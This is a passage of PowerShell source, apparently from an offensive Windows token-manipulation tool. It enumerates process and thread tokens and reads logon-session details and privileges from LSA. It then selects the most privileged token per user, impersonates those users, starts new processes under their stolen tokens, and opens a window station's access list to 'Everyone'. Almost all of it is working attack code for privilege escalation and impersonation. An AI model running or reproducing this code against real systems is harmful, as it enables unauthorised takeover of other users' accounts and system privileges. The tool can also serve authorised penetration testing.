$GetSecurityInfo.Invoke($hObject, 0x7, $Win32Constants.DACL_SECURITY_INFORMATION, [Ref]$ppSidOwner, [Ref]$ppSidGroup, [Ref]$ppDacl, [Ref]$ppSacl, [Ref]$ppSecurityDescriptor)\n        if ($retVal -ne 0)\n        {\n            Write-Error \"Unable to call GetSecurityInfo. ErrorCode: $retVal\"\n        }\n\n        if ($ppDacl -ne [IntPtr]::Zero)\n        {\n            $AclObj = [System.Runtime.InteropServices.Marshal]::PtrToStructure($ppDacl, [Type]$ACL)\n\n            #Add all users to acl\n            [UInt32]$RealSize = 2000\n            $pAllUsersSid = [System.Runtime.InteropServices.Marshal]::AllocHGlobal($RealSize)\n            $Success = $CreateWellKnownSid.Invoke(1, [IntPtr]::Zero, $pAllUsersSid, [Ref]$RealSize)\n            if (-not $Success)\n            {\n                Throw (New-Object ComponentModel.Win32Exception)\n            }\n\n            #For user \"Everyone\"\n            $TrusteeSize = [System.Runtime.InteropServices.Marshal]::SizeOf([Type]$TRUSTEE)\n            $TrusteePtr = [System.Runtime.InteropServices.Marshal]::AllocHGlobal($TrusteeSize)\n            $TrusteeObj = [System.Runtime.InteropServices.Marshal]::PtrToStructure($TrusteePtr, [Type]$TRUSTEE)\n            [System.Runtime.InteropServices.Marshal]::FreeHGlobal($TrusteePtr)\n            $TrusteeObj.pMultipleTrustee = [IntPtr]::Zero\n            $TrusteeObj.MultipleTrusteeOperation = 0\n            $TrusteeObj.TrusteeForm = $Win32Constants.TRUSTEE_IS_SID\n            $TrusteeObj.TrusteeType = $Win32Constants.TRUSTEE_IS_WELL_KNOWN_GROUP\n            $TrusteeObj.ptstrName = $pAllUsersSid\n\n            #Give full permission\n            $ExplicitAccessSize = [System.Runtime.InteropServices.Marshal]::SizeOf([Type]$EXPLICIT_ACCESS)\n            $ExplicitAccessPtr = [System.Runtime.InteropServices.Marshal]::AllocHGlobal($ExplicitAccessSize)\n            $ExplicitAccess = [System.Runtime.InteropServices.Marshal]::PtrToStructure($ExplicitAccessPtr, [Type]$EXPLICIT_ACCESS)\n            [System.Runtime.InteropServices.Marshal]::FreeHGlobal($ExplicitAccessPtr)\n            $ExplicitAccess.grfAccessPermissions = 0xf03ff\n            $ExplicitAccess.grfAccessMode = $Win32constants.GRANT_ACCESS\n            $ExplicitAccess.grfInheritance = $Win32Constants.OBJECT_INHERIT_ACE\n            $ExplicitAccess.Trustee = $TrusteeObj\n\n            [IntPtr]$NewDacl = [IntPtr]::Zero\n\n            $RetVal = $SetEntriesInAclW.Invoke(1, [Ref]$ExplicitAccess, $ppDacl, [Ref]$NewDacl)\n            if ($RetVal -ne 0)\n            {\n                Write-Error \"Error calling SetEntriesInAclW: $RetVal\"\n            }\n\n            [System.Runtime.InteropServices.Marshal]::FreeHGlobal($pAllUsersSid)\n\n            if ($NewDacl -eq [IntPtr]::Zero)\n            {\n                throw \"New DACL is null\"\n            }\n\n            #0x7 is window station, change for other types\n            $RetVal = $SetSecurityInfo.Invoke($hObject, 0x7, $Win32Constants.DACL_SECURITY_INFORMATION, $ppSidOwner, $ppSidGroup, $NewDacl, $ppSacl)\n            if ($RetVal -ne 0)\n            {\n                Write-Error \"SetSecurityInfo failed. Return value: $RetVal\"\n            }\n\n            $LocalFree.Invoke($ppSecurityDescriptor) | Out-Null\n        }\n    }\n\n\n    #Get the primary token for the specified processId\n    function Get-PrimaryToken\n    {\n        Param(\n            [Parameter(Position=0, Mandatory=$true)]\n            [UInt32]\n            $ProcessId,\n\n            #Open the token with all privileges. Requires SYSTEM because some of the privileges are restricted to SYSTEM.\n            [Parameter()]\n            [Switch]\n            $FullPrivs\n        )\n\n        if ($FullPrivs)\n        {\n            $TokenPrivs = $Win32Constants.TOKEN_ALL_ACCESS\n        }\n        else\n        {\n            $TokenPrivs = $Win32Constants.TOKEN_ASSIGN_PRIMARY -bor $Win32Constants.TOKEN_DUPLICATE -bor $Win32Constants.TOKEN_IMPERSONATE -bor $Win32Constants.TOKEN_QUERY \n        }\n\n        $ReturnStruct = New-Object PSObject\n\n        $hProcess = $OpenProcess.Invoke($Win32Constants.PROCESS_QUERY_INFORMATION, $true, [UInt32]$ProcessId)\n        $ReturnStruct | Add-Member -MemberType NoteProperty -Name hProcess -Value $hProcess\n        if ($hProcess -eq [IntPtr]::Zero)\n        {\n            #If a process is a protected process it cannot be enumerated. This call should only fail for protected processes.\n            $ErrorCode = [System.Runtime.InteropServices.Marshal]::GetLastWin32Error()\n            Write-Verbose \"Failed to open process handle for ProcessId: $ProcessId. ProcessName $((Get-Process -Id $ProcessId).Name). Error code: $ErrorCode . This is likely because this is a protected process.\"\n            return $null\n        }\n        else\n        {\n            [IntPtr]$hProcToken = [IntPtr]::Zero\n            $Success = $OpenProcessToken.Invoke($hProcess, $TokenPrivs, [Ref]$hProcToken)\n\n            #Close the handle to hProcess (the process handle)\n            if (-not $CloseHandle.Invoke($hProcess))\n            {\n                $ErrorCode = [System.Runtime.InteropServices.Marshal]::GetLastWin32Error()\n                Write-Warning \"Failed to close process handle, this is unexpected. ErrorCode: $ErrorCode\"\n            }\n            $hProcess = [IntPtr]::Zero\n\n            if ($Success -eq $false -or $hProcToken -eq [IntPtr]::Zero)\n            {\n                $ErrorCode = [System.Runtime.InteropServices.Marshal]::GetLastWin32Error()\n                Write-Warning \"Failed to get processes primary token. ProcessId: $ProcessId. ProcessName $((Get-Process -Id $ProcessId).Name). Error: $ErrorCode\"\n                return $null\n            }\n            else\n            {\n                $ReturnStruct | Add-Member -MemberType NoteProperty -Name hProcToken -Value $hProcToken\n            }\n        }\n\n        return $ReturnStruct\n    }\n\n\n    function Get-ThreadToken\n    {\n        Param(\n            [Parameter(Position=0, Mandatory=$true)]\n            [UInt32]\n            $ThreadId\n        )\n\n        $TokenPrivs = $Win32Constants.TOKEN_ALL_ACCESS\n\n        $RetStruct = New-Object PSObject\n        [IntPtr]$hThreadToken = [IntPtr]::Zero\n\n        $hThread = $OpenThread.Invoke($Win32Constants.THREAD_ALL_ACCESS, $false, $ThreadId)\n        if ($hThread -eq [IntPtr]::Zero)\n        {\n            $ErrorCode = [System.Runtime.InteropServices.Marshal]::GetLastWin32Error()\n            if ($ErrorCode -ne $Win32Constants.ERROR_INVALID_PARAMETER) #The thread probably no longer exists\n            {\n                Write-Warning \"Failed to open thread handle for ThreadId: $ThreadId. Error code: $ErrorCode\"\n            }\n        }\n        else\n        {\n            $Success = $OpenThreadToken.Invoke($hThread, $TokenPrivs, $false, [Ref]$hThreadToken)\n            if (-not $Success)\n            {\n                $ErrorCode = [System.Runtime.InteropServices.Marshal]::GetLastWin32Error()\n                if (($ErrorCode -ne $Win32Constants.ERROR_NO_TOKEN) -and  #This error is returned when the thread isn't impersonated\n                 ($ErrorCode -ne $Win32Constants.ERROR_INVALID_PARAMETER)) #Probably means the thread was closed\n                {\n                    Write-Warning \"Failed to call OpenThreadToken for ThreadId: $ThreadId. Error code: $ErrorCode\"\n                }\n            }\n            else\n            {\n                if($Instance){\n                    Write-Verbose \"$Instance : Successfully queried thread token\"\n                }else{\n                    Write-Verbose \"Successfully queried thread token\"\n                }\n            }\n\n            #Close the handle to hThread (the thread handle)\n            if (-not $CloseHandle.Invoke($hThread))\n            {\n                $ErrorCode = [System.Runtime.InteropServices.Marshal]::GetLastWin32Error()\n                Write-Warning \"Failed to close thread handle, this is unexpected. ErrorCode: $ErrorCode\"\n            }\n            $hThread = [IntPtr]::Zero\n        }\n\n        $RetStruct | Add-Member -MemberType NoteProperty -Name hThreadToken -Value $hThreadToken\n        return $RetStruct\n    }\n\n\n    #Gets important information about the token such as the logon type associated with the logon\n    function Get-TokenInformation\n    {\n        Param(\n            [Parameter(Position=0, Mandatory=$true)]\n            [IntPtr]\n            $hToken\n        )\n\n        $ReturnObj = $null\n\n        $TokenStatsSize = [System.Runtime.InteropServices.Marshal]::SizeOf([Type]$TOKEN_STATISTICS)\n        [IntPtr]$TokenStatsPtr = [System.Runtime.InteropServices.Marshal]::AllocHGlobal($TokenStatsSize)\n        [UInt32]$RealSize = 0\n        $Success = $GetTokenInformation.Invoke($hToken, $TOKEN_INFORMATION_CLASS::TokenStatistics, $TokenStatsPtr, $TokenStatsSize, [Ref]$RealSize)\n        if (-not $Success)\n        {\n            $ErrorCode = [System.Runtime.InteropServices.Marshal]::GetLastWin32Error()\n            Write-Warning \"GetTokenInformation failed. Error code: $ErrorCode\"\n        }\n        else\n        {\n            $TokenStats = [System.Runtime.InteropServices.Marshal]::PtrToStructure($TokenStatsPtr, [Type]$TOKEN_STATISTICS)\n\n            #Query LSA to determine what the logontype of the session is that the token corrosponds to, as well as the username/domain of the logon\n            $LuidPtr = [System.Runtime.InteropServices.Marshal]::AllocHGlobal([System.Runtime.InteropServices.Marshal]::SizeOf([Type]$LUID))\n            [System.Runtime.InteropServices.Marshal]::StructureToPtr($TokenStats.AuthenticationId, $LuidPtr, $false)\n\n            [IntPtr]$LogonSessionDataPtr = [IntPtr]::Zero\n            $ReturnVal = $LsaGetLogonSessionData.Invoke($LuidPtr, [Ref]$LogonSessionDataPtr)\n            if ($ReturnVal -ne 0 -and $LogonSessionDataPtr -eq [IntPtr]::Zero)\n            {\n                Write-Warning \"Call to LsaGetLogonSessionData failed. Error code: $ReturnVal. LogonSessionDataPtr = $LogonSessionDataPtr\"\n            }\n            else\n            {\n                $LogonSessionData = [System.Runtime.InteropServices.Marshal]::PtrToStructure($LogonSessionDataPtr, [Type]$SECURITY_LOGON_SESSION_DATA)\n                if ($LogonSessionData.Username.Buffer -ne [IntPtr]::Zero -and \n                    $LogonSessionData.LoginDomain.Buffer -ne [IntPtr]::Zero)\n                {\n                    #Get the username and domainname associated with the token\n                    $Username = [System.Runtime.InteropServices.Marshal]::PtrToStringUni($LogonSessionData.Username.Buffer, $LogonSessionData.Username.Length/2)\n                    $Domain = [System.Runtime.InteropServices.Marshal]::PtrToStringUni($LogonSessionData.LoginDomain.Buffer, $LogonSessionData.LoginDomain.Length/2)\n\n                    #If UserName is for the computer account, figure out what account it actually is (SYSTEM, NETWORK SERVICE)\n                    #Only do this for the computer account because other accounts return correctly. Also, doing this for a domain account \n                    #results in querying the domain controller which is unwanted.\n                    if ($Username -ieq \"$($env:COMPUTERNAME)`$\")\n                    {\n                        [UInt32]$Size = 100\n                        [UInt32]$NumUsernameChar = $Size / 2\n                        [UInt32]$NumDomainChar = $Size / 2\n                        [UInt32]$SidNameUse = 0\n                        $UsernameBuffer = [System.Runtime.InteropServices.Marshal]::AllocHGlobal($Size)\n                        $DomainBuffer = [System.Runtime.InteropServices.Marshal]::AllocHGlobal($Size)\n                        $Success = $LookupAccountSidW.Invoke([IntPtr]::Zero, $LogonSessionData.Sid, $UsernameBuffer, [Ref]$NumUsernameChar, $DomainBuffer, [Ref]$NumDomainChar, [Ref]$SidNameUse)\n\n                        if ($Success)\n                        {\n                            $Username = [System.Runtime.InteropServices.Marshal]::PtrToStringUni($UsernameBuffer)\n                            $Domain = [System.Runtime.InteropServices.Marshal]::PtrToStringUni($DomainBuffer)\n                        }\n                        else\n                        {\n                            $ErrorCode = [System.Runtime.InteropServices.Marshal]::GetLastWin32Error()\n                            Write-Warning \"Error calling LookupAccountSidW. Error code: $ErrorCode\"\n                        }\n\n                        [System.Runtime.InteropServices.Marshal]::FreeHGlobal($UsernameBuffer)\n                        $UsernameBuffer = [IntPtr]::Zero\n                        [System.Runtime.InteropServices.Marshal]::FreeHGlobal($DomainBuffer)\n                        $DomainBuffer = [IntPtr]::Zero\n                    }\n\n                    $ReturnObj = New-Object PSObject\n                    $ReturnObj | Add-Member -Type NoteProperty -Name Domain -Value $Domain\n                    $ReturnObj | Add-Member -Type NoteProperty -Name Username -Value $Username    \n                    $ReturnObj | Add-Member -Type NoteProperty -Name hToken -Value $hToken\n                    $ReturnObj | Add-Member -Type NoteProperty -Name LogonType -Value $LogonSessionData.LogonType\n\n\n                    #Query additional info about the token such as if it is elevated\n                    $ReturnObj | Add-Member -Type NoteProperty -Name IsElevated -Value $false\n\n                    $TokenElevationSize = [System.Runtime.InteropServices.Marshal]::SizeOf([Type]$TOKEN_ELEVATION)\n                    $TokenElevationPtr = [System.Runtime.InteropServices.Marshal]::AllocHGlobal($TokenElevationSize)\n                    [UInt32]$RealSize = 0\n                    $Success = $GetTokenInformation.Invoke($hToken, $TOKEN_INFORMATION_CLASS::TokenElevation, $TokenElevationPtr, $TokenElevationSize, [Ref]$RealSize)\n                    if (-not $Success)\n                    {\n                        $ErrorCode = [System.Runtime.InteropServices.Marshal]::GetLastWin32Error()\n                        Write-Warning \"GetTokenInformation failed to retrieve TokenElevation status. ErrorCode: $ErrorCode\" \n                    }\n                    else\n                    {\n                        $TokenElevation = [System.Runtime.InteropServices.Marshal]::PtrToStructure($TokenelevationPtr, [Type]$TOKEN_ELEVATION)\n                        if ($TokenElevation.TokenIsElevated -ne 0)\n                        {\n                            $ReturnObj.IsElevated = $true\n                        }\n                    }\n                    [System.Runtime.InteropServices.Marshal]::FreeHGlobal($TokenElevationPtr)\n\n\n                    #Query the token type to determine if the token is a primary or impersonation token\n                    $ReturnObj | Add-Member -Type NoteProperty -Name TokenType -Value \"UnableToRetrieve\"\n\n                    [UInt32]$TokenTypeSize = 4\n                    [IntPtr]$TokenTypePtr = [System.Runtime.InteropServices.Marshal]::AllocHGlobal($TokenTypeSize)\n                    [UInt32]$RealSize = 0\n                    $Success = $GetTokenInformation.Invoke($hToken, $TOKEN_INFORMATION_CLASS::TokenType, $TokenTypePtr, $TokenTypeSize, [Ref]$RealSize)\n                    if (-not $Success)\n                    {\n                        $ErrorCode = [System.Runtime.InteropServices.Marshal]::GetLastWin32Error()\n                        Write-Warning \"GetTokenInformation failed to retrieve TokenImpersonationLevel status. ErrorCode: $ErrorCode\"\n                    }\n                    else\n                    {\n                        [UInt32]$TokenType = [System.Runtime.InteropServices.Marshal]::PtrToStructure($TokenTypePtr, [Type][UInt32])\n                        switch($TokenType)\n                        {\n                            1 {$ReturnObj.TokenType = \"Primary\"}\n                            2 {$ReturnObj.TokenType = \"Impersonation\"}\n                        }\n                    }\n                    [System.Runtime.InteropServices.Marshal]::FreeHGlobal($TokenTypePtr)\n\n\n                    #Query the impersonation level if the token is an Impersonation token\n                    if ($ReturnObj.TokenType -ieq \"Impersonation\")\n                    {\n                        $ReturnObj | Add-Member -Type NoteProperty -Name ImpersonationLevel -Value \"UnableToRetrieve\"\n\n                        [UInt32]$ImpersonationLevelSize = 4\n                        [IntPtr]$ImpersonationLevelPtr = [System.Runtime.InteropServices.Marshal]::AllocHGlobal($ImpersonationLevelSize) #sizeof uint32\n                        [UInt32]$RealSize = 0\n                        $Success = $GetTokenInformation.Invoke($hToken, $TOKEN_INFORMATION_CLASS::TokenImpersonationLevel, $ImpersonationLevelPtr, $ImpersonationLevelSize, [Ref]$RealSize)\n                        if (-not $Success)\n                        {\n                            $ErrorCode = [System.Runtime.InteropServices.Marshal]::GetLastWin32Error()\n                            Write-Warning \"GetTokenInformation failed to retrieve TokenImpersonationLevel status. ErrorCode: $ErrorCode\"\n                        }\n                        else\n                        {\n                            [UInt32]$ImpersonationLevel = [System.Runtime.InteropServices.Marshal]::PtrToStructure($ImpersonationLevelPtr, [Type][UInt32])\n                            switch ($ImpersonationLevel)\n                            {\n                                0 { $ReturnObj.ImpersonationLevel = \"SecurityAnonymous\" }\n                                1 { $ReturnObj.ImpersonationLevel = \"SecurityIdentification\" }\n                                2 { $ReturnObj.ImpersonationLevel = \"SecurityImpersonation\" }\n                                3 { $ReturnObj.ImpersonationLevel = \"SecurityDelegation\" }\n                            }\n                        }\n                        [System.Runtime.InteropServices.Marshal]::FreeHGlobal($ImpersonationLevelPtr)\n                    }\n\n\n                    #Query the token sessionid\n                    $ReturnObj | Add-Member -Type NoteProperty -Name SessionID -Value \"Unknown\"\n\n                    [UInt32]$TokenSessionIdSize = 4\n                    [IntPtr]$TokenSessionIdPtr = [System.Runtime.InteropServices.Marshal]::AllocHGlobal($TokenSessionIdSize)\n                    [UInt32]$RealSize = 0\n                    $Success = $GetTokenInformation.Invoke($hToken, $TOKEN_INFORMATION_CLASS::TokenSessionId, $TokenSessionIdPtr, $TokenSessionIdSize, [Ref]$RealSize)\n                    if (-not $Success)\n                    {\n                        $ErrorCode = [System.Runtime.InteropServices.Marshal]::GetLastWin32Error()\n                        Write-Warning \"GetTokenInformation failed to retrieve Token SessionId. ErrorCode: $ErrorCode\"\n                    }\n                    else\n                    {\n                        [UInt32]$TokenSessionId = [System.Runtime.InteropServices.Marshal]::PtrToStructure($TokenSessionIdPtr, [Type][UInt32])\n                        $ReturnObj.SessionID = $TokenSessionId\n                    }\n                    [System.Runtime.InteropServices.Marshal]::FreeHGlobal($TokenSessionIdPtr)\n\n\n                    #Query the token privileges\n                    $ReturnObj | Add-Member -Type NoteProperty -Name PrivilegesEnabled -Value @()\n                    $ReturnObj | Add-Member -Type NoteProperty -Name PrivilegesAvailable -Value @()\n\n                    [UInt32]$TokenPrivilegesSize = 1000\n                    [IntPtr]$TokenPrivilegesPtr = [System.Runtime.InteropServices.Marshal]::AllocHGlobal($TokenPrivilegesSize)\n                    [UInt32]$RealSize = 0\n                    $Success = $GetTokenInformation.Invoke($hToken, $TOKEN_INFORMATION_CLASS::TokenPrivileges, $TokenPrivilegesPtr, $TokenPrivilegesSize, [Ref]$RealSize)\n                    if (-not $Success)\n                    {\n                        $ErrorCode = [System.Runtime.InteropServices.Marshal]::GetLastWin32Error()\n                        Write-Warning \"GetTokenInformation failed to retrieve Token SessionId. ErrorCode: $ErrorCode\"\n                    }\n                    else\n                    {\n                        $TokenPrivileges = [System.Runtime.InteropServices.Marshal]::PtrToStructure($TokenPrivilegesPtr, [Type]$TOKEN_PRIVILEGES)\n                        \n                        #Loop through each privilege\n                        [IntPtr]$PrivilegesBasePtr = [IntPtr](Add-SignedIntAsUnsigned $TokenPrivilegesPtr ([System.Runtime.InteropServices.Marshal]::OffsetOf([Type]$TOKEN_PRIVILEGES, \"Privileges\")))\n                        $LuidAndAttributeSize = [System.Runtime.InteropServices.Marshal]::SizeOf([Type]$LUID_AND_ATTRIBUTES)\n                        for ($i = 0; $i -lt $TokenPrivileges.PrivilegeCount; $i++)\n                        {\n                            $LuidAndAttributePtr = [IntPtr](Add-SignedIntAsUnsigned $PrivilegesBasePtr ($LuidAndAttributeSize * $i))\n\n                            $LuidAndAttribute = [System.Runtime.InteropServices.Marshal]::PtrToStructure($LuidAndAttributePtr, [Type]$LUID_AND_ATTRIBUTES)\n\n                            #Lookup privilege name\n                            [UInt32]$PrivilegeNameSize = 60\n                            $PrivilegeNamePtr = [System.Runtime.InteropServices.Marshal]::AllocHGlobal($PrivilegeNameSize)\n                            $PLuid = $LuidAndAttributePtr #The Luid structure is the first object in the LuidAndAttributes structure, so a ptr to LuidAndAttributes also points to Luid\n\n                            $Success = $LookupPrivilegeNameW.Invoke([IntPtr]::Zero, $PLuid, $PrivilegeNamePtr, [Ref]$PrivilegeNameSize)\n                            if (-not $Success)\n                            {\n                                $ErrorCode = [System.Runtime.InteropServices.Marshal]::GetLastWin32Error()\n                                Write-Warning \"Call to LookupPrivilegeNameW failed. Error code: $ErrorCode. RealSize: $PrivilegeNameSize\"\n                            }\n                            $PrivilegeName = [System.Runtime.InteropServices.Marshal]::PtrToStringUni($PrivilegeNamePtr)\n\n                            #Get the privilege attributes\n                            $PrivilegeStatus = \"\"\n                            $Enabled = $false\n\n                            if ($LuidAndAttribute.Attributes -eq 0)\n                            {\n                                $Enabled = $false\n                            }\n                            if (($LuidAndAttribute.Attributes -band $Win32Constants.SE_PRIVILEGE_ENABLED_BY_DEFAULT) -eq $Win32Constants.SE_PRIVILEGE_ENABLED_BY_DEFAULT) #enabled by default\n                            {\n                                $Enabled = $true\n                            }\n                            if (($LuidAndAttribute.Attributes -band $Win32Constants.SE_PRIVILEGE_ENABLED) -eq $Win32Constants.SE_PRIVILEGE_ENABLED) #enabled\n                            {\n                                $Enabled = $true\n                            }\n                            if (($LuidAndAttribute.Attributes -band $Win32Constants.SE_PRIVILEGE_REMOVED) -eq $Win32Constants.SE_PRIVILEGE_REMOVED) #SE_PRIVILEGE_REMOVED. This should never exist. Write a warning if it is found so I can investigate why/how it was found.\n                            {\n                                Write-Warning \"Unexpected behavior: Found a token with SE_PRIVILEGE_REMOVED. Please report this as a bug. \"\n                            }\n\n                            if ($Enabled)\n                            {\n                                $ReturnObj.PrivilegesEnabled += ,$PrivilegeName\n                            }\n                            else\n                            {\n                                $ReturnObj.PrivilegesAvailable += ,$PrivilegeName\n                            }\n\n                            [System.Runtime.InteropServices.Marshal]::FreeHGlobal($PrivilegeNamePtr)\n                        }\n                    }\n                    [System.Runtime.InteropServices.Marshal]::FreeHGlobal($TokenPrivilegesPtr)\n\n                }\n                else\n                {\n                    Write-Verbose \"Call to LsaGetLogonSessionData succeeded. This SHOULD be SYSTEM since there is no data. $($LogonSessionData.UserName.Length)\"\n                }\n\n                #Free LogonSessionData\n                $ntstatus = $LsaFreeReturnBuffer.Invoke($LogonSessionDataPtr)\n                $LogonSessionDataPtr = [IntPtr]::Zero\n                if ($ntstatus -ne 0)\n                {\n                    Write-Warning \"Call to LsaFreeReturnBuffer failed. Error code: $ntstatus\"\n                }\n            }\n\n            [System.Runtime.InteropServices.Marshal]::FreeHGlobal($LuidPtr)\n            $LuidPtr = [IntPtr]::Zero\n        }\n\n        [System.Runtime.InteropServices.Marshal]::FreeHGlobal($TokenStatsPtr)\n        $TokenStatsPtr = [IntPtr]::Zero\n\n        return $ReturnObj\n    }\n\n\n    #Takes an array of TokenObjects built by the script and returns the unique ones\n    function Get-UniqueTokens\n    {\n        Param(\n            [Parameter(Position=0, Mandatory=$true)]\n            [Object[]]\n            $AllTokens\n        )\n\n        $TokenByUser = @{}\n        $TokenByEnabledPriv = @{}\n        $TokenByAvailablePriv = @{}\n\n        #Filter tokens by user\n        foreach ($Token in $AllTokens)\n        {\n            $Key = $Token.Domain + \"\\\" + $Token.Username\n            if (-not $TokenByUser.ContainsKey($Key))\n            {\n                #Filter out network logons and junk Windows accounts. This filter eliminates accounts which won't have creds because\n                #    they are network logons (type 3) or logons for which the creds don't matter like LOCOAL SERVICE, DWM, etc..\n                if ($Token.LogonType -ne 3 -and\n                    $Token.Username -inotmatch \"^DWM-\\d+$\" -and\n                    $Token.Username -inotmatch \"^LOCAL\\sSERVICE$\")\n                {\n                    $TokenByUser.Add($Key, $Token)\n                }\n            }\n            else\n            {\n                #If Tokens have equal elevation levels, compare their privileges.\n                if($Token.IsElevated -eq $TokenByUser[$Key].IsElevated)\n                {\n                    if (($Token.PrivilegesEnabled.Count + $Token.PrivilegesAvailable.Count) -gt ($TokenByUser[$Key].PrivilegesEnabled.Count + $TokenByUser[$Key].PrivilegesAvailable.Count))\n                    {\n                        $TokenByUser[$Key] = $Token\n                    }\n                }\n                #If the new token is elevated and the current token isn't, use the new token\n                elseif (($Token.IsElevated -eq $true) -and ($TokenByUser[$Key].IsElevated -eq $false))\n                {\n                    $TokenByUser[$Key] = $Token\n                }\n            }\n        }\n\n        #Filter tokens by privilege\n        foreach ($Token in $AllTokens)\n        {\n            $Fullname = \"$($Token.Domain)\\$($Token.Username)\"\n\n            #Filter currently enabled privileges\n            foreach ($Privilege in $Token.PrivilegesEnabled)\n            {\n                if ($TokenByEnabledPriv.ContainsKey($Privilege))\n                {\n                    if($TokenByEnabledPriv[$Privilege] -notcontains $Fullname)\n                    {\n                        $TokenByEnabledPriv[$Privilege] += ,$Fullname\n                    }\n                }\n                else\n                {\n                    $TokenByEnabledPriv.Add($Privilege, @($Fullname))\n                }\n            }\n\n            #Filter currently available (but not enable) privileges\n            foreach ($Privilege in $Token.PrivilegesAvailable)\n            {\n                if ($TokenByAvailablePriv.ContainsKey($Privilege))\n                {\n                    if($TokenByAvailablePriv[$Privilege] -notcontains $Fullname)\n                    {\n                        $TokenByAvailablePriv[$Privilege] += ,$Fullname\n                    }\n                }\n                else\n                {\n                    $TokenByAvailablePriv.Add($Privilege, @($Fullname))\n                }\n            }\n        }\n\n        $ReturnDict = @{\n            TokenByUser = $TokenByUser\n            TokenByEnabledPriv = $TokenByEnabledPriv\n            TokenByAvailablePriv = $TokenByAvailablePriv\n        }\n\n        return (New-Object PSObject -Property $ReturnDict)\n    }\n\n\n    function Invoke-ImpersonateUser\n    {\n        Param(\n            [Parameter(Position=0, Mandatory=$true)]\n            [IntPtr]\n            $hToken\n        )\n\n        #Duplicate the token so it can be used to create a new process\n        [IntPtr]$NewHToken = [IntPtr]::Zero\n        $Success = $DuplicateTokenEx.Invoke($hToken, $Win32Constants.MAXIMUM_ALLOWED, [IntPtr]::Zero, 3, 1, [Ref]$NewHToken) #todo does this need to be freed\n        if (-not $Success)\n        {\n            $ErrorCode = [System.Runtime.InteropServices.Marshal]::GetLastWin32Error()\n            Write-Warning \"DuplicateTokenEx failed. ErrorCode: $ErrorCode\"\n        }\n        else\n        {\n            $Success = $ImpersonateLoggedOnUser.Invoke($NewHToken)\n            if (-not $Success)\n            {\n                $Errorcode = [System.Runtime.InteropServices.Marshal]::GetLastWin32Error()\n                Write-Warning \"Failed to ImpersonateLoggedOnUser. Error code: $Errorcode\"\n            }\n        }\n\n        $Success = $CloseHandle.Invoke($NewHToken)\n        $NewHToken = [IntPtr]::Zero\n        if (-not $Success)\n        {\n            $ErrorCode = [System.Runtime.InteropServices.Marshal]::GetLastWin32Error()\n            Write-Warning \"CloseHandle failed to close NewHToken. ErrorCode: $ErrorCode\"\n        }\n\n        return $Success\n    }\n\n\n    function Create-ProcessWithToken\n    {\n        Param(\n            [Parameter(Position=0, Mandatory=$true)]\n            [IntPtr]\n            $hToken,\n\n            [Parameter(Position=1, Mandatory=$true)]\n            [String]\n            $ProcessName,\n\n            [Parameter(Position=2)]\n            [String]\n            $ProcessArgs,\n\n            [Parameter(Position=3)]\n            [Switch]\n            $PassThru\n        )\n        Write-Verbose \"Entering Create-ProcessWithToken\"\n        #Duplicate the token so it can be used to create a new process\n        [IntPtr]$NewHToken = [IntPtr]::Zero\n        $Success = $DuplicateTokenEx.Invoke($hToken, $Win32Constants.MAXIMUM_ALLOWED, [IntPtr]::Zero, 3, 1, [Ref]$NewHToken)\n        if (-not $Success)\n        {\n            $ErrorCode = [System.Runtime.InteropServices.Marshal]::GetLastWin32Error()\n            Write-Warning \"DuplicateTokenEx failed. ErrorCode: $ErrorCode\"\n        }\n        else\n        {\n            $StartupInfoSize = [System.Runtime.InteropServices.Marshal]::SizeOf([Type]$STARTUPINFO)\n            [IntPtr]$StartupInfoPtr = [System.Runtime.InteropServices.Marshal]::AllocHGlobal($StartupInfoSize)\n            $memset.Invoke($StartupInfoPtr, 0, $StartupInfoSize) | Out-Null\n            [System.Runtime.InteropServices.Marshal]::WriteInt32($StartupInfoPtr, $StartupInfoSize) #The first parameter (cb) is a DWORD which is the size of the struct\n\n            $ProcessInfoSize = [System.Runtime.InteropServices.Marshal]::SizeOf([Type]$PROCESS_INFORMATION)\n            [IntPtr]$ProcessInfoPtr = [System.Runtime.InteropServices.Marshal]::AllocHGlobal($ProcessInfoSize)\n\n            $ProcessNamePtr = [System.Runtime.InteropServices.Marshal]::StringToHGlobalUni(\"$ProcessName\")\n            $ProcessArgsPtr = [IntPtr]::Zero\n            if (-not [String]::IsNullOrEmpty($ProcessArgs))\n            {\n                $ProcessArgsPtr = [System.Runtime.InteropServices.Marshal]::StringToHGlobalUni(\"`\"$ProcessName`\" $ProcessArgs\")\n            }\n            \n            $FunctionName = \"\"\n            if ([System.Diagnostics.Process]::GetCurrentProcess().SessionId -eq 0)\n            {\n                #Cannot use CreateProcessWithTokenW when in Session0 because CreateProcessWithTokenW throws an ACCESS_DENIED error. I believe it is because\n                #this API attempts to modify the desktop ACL. I would just use this API all the time, but it requires that I enable SeAssignPrimaryTokenPrivilege\n                #which is not ideal. \n                Write-Verbose \"Running in Session 0. Enabling SeAssignPrimaryTokenPrivilege and calling CreateProcessAsUserW to create a process with alternate token.\"\n                Enable-Privilege -Privilege SeAssignPrimaryTokenPrivilege\n                $Success = $CreateProcessAsUserW.Invoke($NewHToken, $ProcessNamePtr, $ProcessArgsPtr, [IntPtr]::Zero, [IntPtr]::Zero, $false, 0, [IntPtr]::Zero, [IntPtr]::Zero, $StartupInfoPtr, $ProcessInfoPtr)\n                $FunctionName = \"CreateProcessAsUserW\"\n            }\n            else\n            {\n                Write-Verbose \"Not running in Session 0, calling CreateProcessWithTokenW to create a process with alternate token.\"\n                $Success = $CreateProcessWithTokenW.Invoke($NewHToken, 0x0, $ProcessNamePtr, $ProcessArgsPtr, 0, [IntPtr]::Zero, [IntPtr]::Zero, $StartupInfoPtr, $ProcessInfoPtr)\n                $FunctionName = \"CreateProcessWithTokenW\"\n            }\n            if ($Success)\n            {\n                #Free the handles returned in the ProcessInfo structure\n                $ProcessInfo = [System.Runtime.InteropServices.Marshal]::PtrToStructure($ProcessInfoPtr, [Type]$PROCESS_INFORMATION)\n                $CloseHandle.Invoke($ProcessInfo.hProcess) | Out-Null\n                $CloseHandle.Invoke($ProcessInfo.hThread) | Out-Null\n\n\t\t#Pass created System.Diagnostics.Process object to pipeline\n\t\tif ($PassThru) {\n\t\t\t#Retrieving created System.Diagnostics.Process object\n\t\t\t$returnProcess = Get-Process -Id $ProcessInfo.dwProcessId\n\n\t\t\t#Caching process handle so we don't lose it when the process exits\n\t\t\t$null = $returnProcess.Handle\n\n\t\t\t#Passing System.Diagnostics.Process object to pipeline\n\t\t\t$returnProcess\n\t\t}\n            }\n            else\n            {\n                $ErrorCode = [System.Runtime.InteropServices.Marshal]::GetLastWin32Error()\n                Write-Warning 